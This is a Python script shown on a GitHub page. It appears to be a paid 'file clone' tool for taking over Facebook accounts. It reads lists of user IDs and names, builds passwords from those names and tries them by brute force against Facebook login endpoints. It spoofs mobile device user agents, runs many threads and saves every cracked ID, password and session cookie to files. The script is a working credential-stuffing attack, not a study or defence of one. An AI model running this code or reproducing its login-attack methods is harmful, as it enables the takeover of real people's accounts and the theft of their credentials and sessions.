-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy path3.py
More file actions
632 lines (604 loc) · 22.4 KB
/
3.py
File metadata and controls
632 lines (604 loc) · 22.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
#!/usr/bin/python
#Dec By MAHADI-HASAN
#FUCK-BY-MAHADI🖕
#Original written Attitude King Miraj
#DANGER(ATTITUDE KING MIRAJ) Brand
#Feel DANGER POWER
import os
os.system("pip install pycurl")
os.system('pip uninstall requests chardet urllib3 idna certifi -y;pip install chardet urllib3 idna certifi requests')
os.system('pip install httpx pip install beautifulsoup4')
try:
import os,requests,json,time,re,random,sys,uuid,string,subprocess
from string import *
import bs4
#import dz
from concurrent.futures import ThreadPoolExecutor as tred
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
except ModuleNotFoundError:
print('\n Installing missing modules ...')
os.system('pip install requests bs4 futures==2 > /dev/null')
from urllib.request import Request, urlopen
import os, requests, re,platform, sys, random, subprocess, threading, itertools,base64,uuid,zlib,re,json,uuid,subprocess,shutil,webbrowser,time,json,sys,random,datetime,time,re,subprocess,platform,string,json,time,re,random,sys,string,uuid
from concurrent.futures import ThreadPoolExecutor as mogidDANGER
from string import *
from random import randint
from time import sleep as slp
from os import system as cmd
from zlib import decompress
import os, platform
from concurrent.futures import ThreadPoolExecutor
fast_work = ThreadPoolExecutor(max_workers=15).submit
import random
import string
model2 ="""M2101K6G
Aquaris U Plus
SM-G780G
SM-O497J
SM-L427V
SM-C297Z
SM-G507X
SM-Y634L
SM-J204F
SM-R911A
SM-X801O
SM-A792E
SM-H270F
SM-P993J
SM-V233F
SM-O861W
SM-D182C
SM-Y729G
SM-Z367Q
SM-U191O
SM-U559U
SM-B567Y
SM-O846M
SM-G342Z
SM-K531M
SM-I847H
SM-A728M
SM-L637H
SM-L429N
SM-P413J
SM-N731T
SM-R505B
SM-A744X
SM-O400L
SM-F799H
SM-Z679E
SM-G822H
SM-N489K
SM-Z200Z
SM-Y119O
SM-E201F
SM-N785T
SM-G200V
SM-R067J
SM-N134B
SM-N227J
SM-K221P
SM-S150D
SM-A869J
SM-H143V
SM-C469H
SM-T152I
SM-Y575D
SM-W880B
SM-W460Q
SM-Q159J
SM-U637R
SM-J924Q
SM-W512P
SM-I745B
SM-O118H
SM-U111M
SM-U522B
SM-B611V
SM-G520J
SM-D144B
SM-C181B
SM-V128Q
SM-U167W
SM-L098E
SM-P454L
SM-L943O
SM-D368H
SM-P485X
SM-C715N
SM-H010U
SM-H710B
SM-X633F
SM-Z040T
SM-Q391G
SM-N451P
SM-T115B
SM-R248C
SM-T618P
SM-S067L
SM-M619P
SM-Q048A
SM-I787D
SM-X275W
SM-G911F
SM-R924W
SM-S506Z
SM-V941V
SM-G016M
SM-O008J
SM-L296E
SM-U876V
SM-L600X
SM-G169P
SM-F578L
SM-S727V
SM-F213B
SM-U822H
SM-Q995Y
SM-I602I
SM-V225C
SM-U921J
SM-Z302E
SM-Y080Z
SM-X174G
SM-T157W
SM-M311W
SM-H791P
SM-Q343U
SM-H261C
SM-D442E
SM-E047H
SM-S082M
SM-U311K
SM-Z651V
SM-I566H
SM-I593C
SM-L375P
SM-D399D
SM-Y086S
SM-O365U
SM-W782A
SM-S236Q
SM-D514J
SM-W806F
SM-W809F
SM-M645P
SM-W098A
SM-O026U
SM-Y689Z
SM-D832N
SM-C691X
SM-D921H
SM-G403Y
SM-S210U
SM-D768K
SM-F912H
SM-H856A
SM-J184W
SM-D512U
SM-K786Z
SM-Z107O
SM-D499G
SM-C815N
SM-D590H
SM-V695N
SM-M093A
SM-S354P
SM-F657J
SM-R743O
SM-A180A
SM-B651H
SM-X279B
SM-X429B
SM-R588G
SM-Y318K
SM-G967W
SM-P668C
SM-B401K
SM-S853U
SM-A377K
SM-K914A
SM-J624R
SM-L536Y
SM-B190B
SM-Q769S
SM-Z872L
SM-S322A
SM-O621Y
SM-N100L
SM-A840S
SM-E543H
SM-H386M
SM-Y932W
SM-T496G
SM-E768E
SM-R031A
SM-Q015D
SM-P522K
SM-D436Z
SM-R077U
SM-I233Z
SM-H906Q
SM-K838M
SM-O369U
SM-F458K
SM-M382E
SM-L337L
SM-G904B
SM-N351H
SM-V670M
SM-W266H
SM-Q576G
SM-G359C
SM-R096P
SM-F952H
SM-Y608N
SM-C736V""".splitlines()
totaldmp = 0
count = 0
loop = 0
oks = []
cps = []
id = []
ps = []
sid = []
total=[]
methods = []
srange = 0
saved = []
totaldmp = 0
filter = []
def randBuildLSB():
vchrome = str(random.randint(100,925))+".0.0."+str(random.randint(1,8))+"."+str(random.randint(40,150))
VAPP = random.randint(410000000,499999999)
END = '[FBAN/FB4A;FBAV/307.0.0.22.35;FBBV/866537537;FBRV/0;FBPN/com.facebook.katana;FBLC/id_ID;FBMF/Realme;FBBD/Realme;FBDV/RMX3771;FBSV/13;FBCA/armeabi-v8a:armeabi;FBDM/{density=2.0,width=720,height=1440};FB_FW/1;]"+"[FBAN/FB4A;FBAV/214.0.0.4.62;FBBV/18966371;FBDM/{density=1.0,width=1280,height=1920};FBLC/en_GB;FBCR/Nepal_Telecom;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-G990B;FBSV/8.3.4;FBOP/1;FBCA/armeabi-v7a:armeabi;]"+"[FBAN/FB4A;FBAV/392.0.0.9.117;FBBV/58527964;FBDM/{density=2.0,width=1280,height=1920};FBLC/en_PK;FBCR/MTN-CG;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-G990E;FBSV/4.5.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]'
ua = f'Dalvik/2.1.0 (Linux; U; Android {random.randint(4,13)}; {random.choice(model2)} Build/SP1A.{random.randint(111111,999999)}.{random.randint(111,999)}) '+END
return ua
def randFBAN():
VAPP = random.randint(410000000,499999999)
ua="[FBAN/FB4A;FBAV/364.0.0.10.112;FBBV/"+str(VAPP)+";FBDM/{density=2.625,width=1080,height=2131};FBLC/en_GB;FBRV/374667243;FBCR/1030;FBMF/samsung;FBBD/SM-C5010;FBPN/com.facebook.katana;FBDV/"+random.choice(model2)+";FBSV/10;FBOP/1;FBCA/arm64-v8a:;]"
return ua
def randBuildvsskj():
END = '[FBAN/Orca-Android;FBAV/137.0.0.1570;FBBV/5827446;[FBAN/Orca-Android;FBAV/364.0.0.10.112;FBPN/com.facebook.orca;FBLC/en_GB;FBBV/374667243;FBCR/null;FBMF/samsung;FBBD/samsung;FBDV/SM-C5010;FBSV/10;FBCA/arm64-v8a:null;FBDM/{density=2.625,width=1080,height=2131};FB_FW/1;]'
ua = f'Dalvik/2.1.0 (Linux; U; Android {random.randint(4,13)}; {random.choice(model2)} Build/SP1A.{random.randint(111111,999999)}.{random.randint(111,999)}) '+END
return ua
sys.stdout.write('\x1b]2; DANGER\x07')
S = '\033[1;37m'
A = '\x1b[38;5;208m'
R = '\x1b[38;5;46m'
F = '\x1b[38;5;48m'
Z = '\033[1;33m'
head = {'Host': 'adsmanager.facebook.com', 'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"', 'viewport-width': '980'}
logo ="""\033[1;32m
d8888b. .d8b. d8b db d888b d88888b d8888b.
88 `8D d8' `8b 888o 88 88' Y8b 88' 88 `8D
88 88 88ooo88 88V8o 88 88 88ooooo 88oobY'
88 88 88~~~88 88 V8o88 88 ooo 88~~~~~ 88`8b
88 .8D 88 88 88 V888 88. ~8~ 88. 88 `88.
Y8888D' YP YP VP V8P Y888P Y88888P 88 YD
\033[1;32mD \033[1;33mA \033[1;34mN \033[1;35mG \033[1;36mE \033[1;37mR~~~\033[1;37m[ALL TIME \033[1;37m FIRE🔥🔥]
\033[1;32m--------------------------------------------------------
\033[1;37m[\033[1;31m•\033[1;37m]\033[1;31mDEVELOPER : \033[1;31mMIRAJ-KHAN
\033[1;37m[\033[1;32m•\033[1;37m]\033[1;32mTOOLS : \033[1;32mFILE-CLONE
\033[1;37m[\033[1;33m•\033[1;37m]\033[1;33mVERSION : \033[1;33m 8.5
\033[1;37m[\033[1;34m•\033[1;37m]\033[1;34mWORKING : \033[1;34mDATA/WIFI
\033[1;37m[\033[1;35m•\033[1;37m]\033[1;35mSTATUS : \033[1;35mPAID
\033[1;32m------------------------------------------------------"""
def clear():
os.system("clear")
print(logo)
def result(OKs,cps):
if len(OKs) != 0 or len(cps) != 0:
print('\n')
print("-----------------------------------------------------")
print(' The Process has been Complete ')
print(' TOTAL OK: %s' % str(len(oks)))
print(' TOTAL CP: %s' % str(len(cps)))
print("-----------------------------------------------------")
input("Press enter to back DANGER Menu ")
exit()
def DANGER():
os.system('clear')
print(logo)
print(f'[1] File Crack')
print(f'[2] Join Whatsapp Group ')
print(f'[3] Join Messenger Group ')
print('')
select = input('Select Menu > ')
if select =='1':
method_crack()
elif select =='2':
os.system('xdg-open https://chat.whatsapp.com/LTBJe0upO8SIUsMXvHVAQd')
pass
elif select =='3':
os.system('xdg-open https://m.me/j/Abb5xIlL-jOql6rR/')
else:
print('\n Select valid option ... ')
time.sleep(2)
DANGER(allkey)
def method_crack():
global methods
clear()
print(f'[1] Method {1}')
print(f'[2] Method {2}')
print(f'[3] Method {3}')
#print(f'[4] Method {4}')
print(f'[0] Back')
print('')
option = input('Select method > ')
if option =='1':
methods.append('methodA')
main_crack().crack(id)
elif option =='2':
methods.append('methodD')
main_crack().crack(id)
elif option =='3':
methods.append('methodC')
main_crack().crack(id)
#elif option =='4':
#methods.append('methodB')
#main_crack().crack(id)
elif option =='0':
mogid()
else:
print('\n Select Valid Option ...')
time.sleep(0.6)
method_crack()
class main_crack():
def __init__(self):
self.id=[]
def crack(self,id):
global methods
clear()
self.file = input('Put File Name > ')
try:
self.id = open(self.file).read().splitlines()
self.pasw()
except FileNotFoundError:
print('Opps File Not Found ...')
time.sleep(2)
os.system('clear')
print(logo)
print('Try Again ...')
time.sleep(2)
main_crack().crack(id)
def methodA(self, sid, name, psw):
try:
global oks,cps,loop
sys.stdout.write(f"\r\033[1;32m[DANGER] \033[1;33m{loop} \033[1;32m| \033[1;34mM1 OK/CP \033[1;35m{len(oks)}/{len(cps)} | \033[1;36m{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
with requests.Session() as session:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_US",
"client_country_code": "US",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': randBuildLSB(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'unknown',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if 'session_key' in q:
ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);DANGERb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={DANGERb};{ckkk}"
print(f"\r{R} [DANGER-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DANGER_OK_ids_M1.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/DANGER_iDs_COOKiEs_M1.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
#print(f"\r{A} [DANGER-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DANGER_CP.txt','a').write(sid+'|'+ps+'\n')
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
time.sleep(7)
self.methodA(sid, name, ps)
def methodC(self, sid, name, psw):
try:
global oks,cps,loop
sys.stdout.write(f"\r\033[1;32m[DANGER] \033[1;33m{loop} \033[1;32m| \033[1;34mM2 OK/CP \033[1;35m{len(oks)}/{len(cps)} | \033[1;36m{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
with requests.Session() as session:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_US",
"client_country_code": "US",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': randBuildvsskj(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if 'session_key' in q:
ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);DANGERb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={DANGERb};{ckkk}"
print(f"\r{R} [DANGER-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DANGER_OK_ids_M2.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/DANGER_iDs_COOKiEs_M2.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
#print(f"\r{A} [DANGER-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DANGER_CP.txt','a').write(sid+'|'+ps+'\n')
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
time.sleep(7)
self.methodC(sid, name, ps)
def methodD(self, sid, name, psw):
global oks,cps,loop
sys.stdout.write(f"\r\033[1;32m[DANGER] \033[1;33m{loop} \033[1;32m| \033[1;34mM3 OK/CP \033[1;35m{len(oks)}/{len(cps)} | \033[1;36m{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
try:
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
session=requests.Session()
sua = randBuildLSB()
getlog = session.get(f'https://d.facebook.com/login/device-based/password/?uid={sid}&flow=login_no_pin&refsrc=deprecated&_rdr')
idpass ={"lsd":re.search('name="lsd" value="(.*?)"', str(getlog.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(getlog.text)).group(1),"uid":sid,"next":"https://d.facebook.com/login/save-device/","flow":"login_no_pin","pass":ps,}
session.headers = {}
session.headers.update({'Host': 'd.facebook.com', 'viewport-width': '980', 'sec-ch-ua': '" Not A;Brand";v="24", "Chromium";v="116"Google Chrome";v="100"', 'sec-ch-ua-mobile': '?1', 'sec-ch-ua-platform': '"Android"', 'sec-ch-prefers-color-scheme': 'dark', 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36 3gpp-gba', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-BD,en-GB;q=0.9,en-US;q=0.8,en;q=0.7'})
complete = session.post('https://d.facebook.com/login/device-based/validate-password/?shbl=0',data=idpass,allow_redirects=False)
if 'c_user' in session.cookies.get_dict():
print(f"\r{R} [DANGER-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DANGER_OK.txt','a').write(sid+'|'+ps+'\n')
break
elif 'checkpoint' in session.cookies.get_dict():
#print(f"\r{A} [DANGER-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DANGER_CP.txt','a').write(sid+'|'+ps+'\n')
break
else:
continue
#time.sleep(31)
loop+=1
except Exception as err:print(err)
except requests.exceptions.ConnectionError:
self.methodD(sid, name, ps)
def pasw(self):
pw = []
clear()
print('Put limit Unlimited')
sl = int(input('Password Limit→'))
os.system("clear")
print(logo)
print(f'\033[1;32m[Example: first123,last1122,firstlast,last,name,ETC]')
print('')
if sl =='':
print('\n Put limit between Unlimited')
elif sl > 20:
print('\nPassword are no Limit')
else:
for sr in range(sl):
pw.append(input(f'Password {sr+1} > '))
os.system("clear")
print(logo)
print(f"{A}Use flight mode before use {S}")
print("\033[1;32m-----------------------------------------------------")
print(f'\033[1;34mCount Ids >> %s ' % len(self.id))
print('\033[1;35mCracking Started >>')
print("-----------------------------------------------------")
with mogidDANGER(max_workers=30) as DANGERworld:
for zsb in self.id:
try:
uid, name = zsb.split('|')
sz = name.split(' ')
if len(sz) == 3 or len(sz) == 4 or len(sz) == 5 or len(sz) == 8:
pwx = pw
else:
pwx = pw
if 'methodA' in methods:
DANGERworld.submit(self.methodA, uid, name, pwx)
elif 'methodB' in methods:
DANGERworld.submit(self.methodB, uid, name, pwx)
elif 'methodC' in methods:
DANGERworld.submit(self.methodC, uid, name, pwx)
elif 'methodD' in methods:
DANGERworld.submit(self.methodD, uid, name, pwx)
except:pass
result(oks,cps)
def danger_menu():
UMO="DANGER-"
uuid = str(os.geteuid()) + str(os.getlogin())
id = "5".join(uuid)
print(logo)
DARK=requests.get("https://github.com/mr-devil-690/DANGER-404/blob/main/Approve.txt").text
if id in DARK:
DANGER()
else:
os.system("clear")
os.system("xdg-open https://chat.whatsapp.com/LTBJe0upO8SIUsMXvHVAQd")
time.sleep(3.0)
os.system("clear")
print(logo)
print("\t\033[30m [\033[1;32m\033[47m First Get Approvel\033[00m\033[1;30m]")
print ("")
print("┌â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”â” \n\033[1;32m│ Note : That is Paid Tools because 100% ok id And FF GAME ID just now login│\033[1;37m\nâ””â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”â”â•â”â•â”â•â”â•â”â•â”â•â”â•â”┘")
print ("")
print(" 7 Day-150à§³ Your Key is Not Approved ")
print(" 15 Day-250à§³ Copy And Send Key To Admin")
print ("")
print (" Your Key : "+UMO+id)
print ("\n")
name = input(" Your Name : ")
print ("")
input(" Press Enter To Send Key")
os.system("xdg-open https://wa.me/+8801780782237")
danger_menu()
danger_menu()